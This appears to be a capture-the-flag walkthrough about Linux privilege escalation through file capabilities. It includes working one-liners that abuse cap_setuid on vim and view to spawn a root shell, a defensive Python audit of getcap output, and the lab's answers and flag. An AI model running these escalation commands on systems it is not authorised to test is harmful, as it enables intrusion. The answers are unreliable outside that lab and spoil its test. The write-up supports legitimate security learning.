Privilege Escalation LinPrivEscCAPA getcap Capabilities

Hacking Truth



Privilege escalation ideally leads to root privileges. This can sometimes be achieved simply by exploiting an existing vulnerability, or in some cases by accessing another user account that has more privileges, information, or access.

Another method system administrators can use to increase the privilege level of a process or binary is “Capabilities”. Capabilities help manage privileges at a more granular level. For example, if the SOC analyst needs to use a tool that needs to initiate socket connections, a regular user would not be able to do that. If the system administrator does not want to give this user higher privileges, they can change the capabilities of the binary. As a result, the binary would get through its task without needing a higher privilege user.

The capabilities man page provides detailed information on its usage and options.


Here, however, we use a different method from the content above, like "nano LinPrivEsc".

First, we will use ssh and come inside his house without informing (atithi devo bhaava, "the guest is god") :-p






man capabilities





First of all we will use the following command to list the enabled capabilities.

getcap -r / 2>/dev/null




karen@ip-10-10-155-55:~$ id
uid=1001(karen) gid=1001(karen) groups=1001(karen)
karen@ip-10-10-155-55:~$ getcap -r / 2>/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/home/karen/vim = cap_setuid+ep
/home/ubuntu/view = cap_setuid+ep
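
From the defender's side, the two cap_setuid entries under /home are the lines that should stand out in this listing. The following Python audit is an added example, not part of the original walkthrough; the high-risk capability set and the system-directory allowlist are assumptions to tune per host.

```python
import re

# Capabilities that allow changing identity or bypassing file permission checks.
# The selection is an assumption for this example; tune it to local policy.
HIGH_RISK = {"cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_module",
             "cap_sys_ptrace", "cap_dac_override", "cap_dac_read_search",
             "cap_chown", "cap_fowner"}
# Locations where package-managed binaries normally live (assumed allowlist).
SYSTEM_DIRS = ("/usr/", "/bin/", "/sbin/", "/lib/", "/lib64/")

# Accepts "path = caps+ep" (the format on this page) and "path caps=ep",
# which newer libcap releases print.
LINE = re.compile(r"^(?P<path>.+?)\s+(?:=\s+)?(?P<caps>[a-z0-9_,]+)[+=](?P<flags>[eip]+)$")

def audit(getcap_output):
    """Return (path, risky_caps, outside_system_dirs) for entries needing review."""
    findings = []
    for line in getcap_output.splitlines():
        m = LINE.match(line.strip())
        if not m or "p" not in m["flags"]:
            continue  # unparsable, or no permitted set granted to every caller
        risky = sorted(set(m["caps"].split(",")) & HIGH_RISK)
        outside = not m["path"].startswith(SYSTEM_DIRS)
        if risky or outside:
            findings.append((m["path"], risky, outside))
    return findings

# The getcap output from the walkthrough above, reused as sample input.
SAMPLE = """\
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/home/karen/vim = cap_setuid+ep
/home/ubuntu/view = cap_setuid+ep
"""

if __name__ == "__main__":
    for path, risky, outside in audit(SAMPLE):
        where = "outside system directories" if outside else "system path"
        print(f"REVIEW {path}: {', '.join(risky) or 'no high-risk caps'} ({where})")
        print(f"  fix after confirming it is not needed: setcap -r {path}")
```

On a live host, feed it the output of `getcap -r / 2>/dev/null` run as root so that directories unreadable to ordinary users are covered as well.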



After searching on GTFOBins, we discover that we can use vim to escalate privileges here.





We can see that python3 is present on the victim machine.




We use the script from GTFOBins, slightly modified to match the version of Python that is installed on the system.


./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'


Now we can see that we are root.




# How many binaries have set capabilities?

Ans: 6

getcap -r / 2>/dev/null



# What other binary can be used through its capabilities?

Ans: view

Once again, we can continue searching on GTFOBins to find the answer to this.





# What is the content of the flag4.txt file?

Ans - THM-9349843


I modified the script a bit and ran it on the system.

/home/ubuntu/view -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'





All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. We do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.
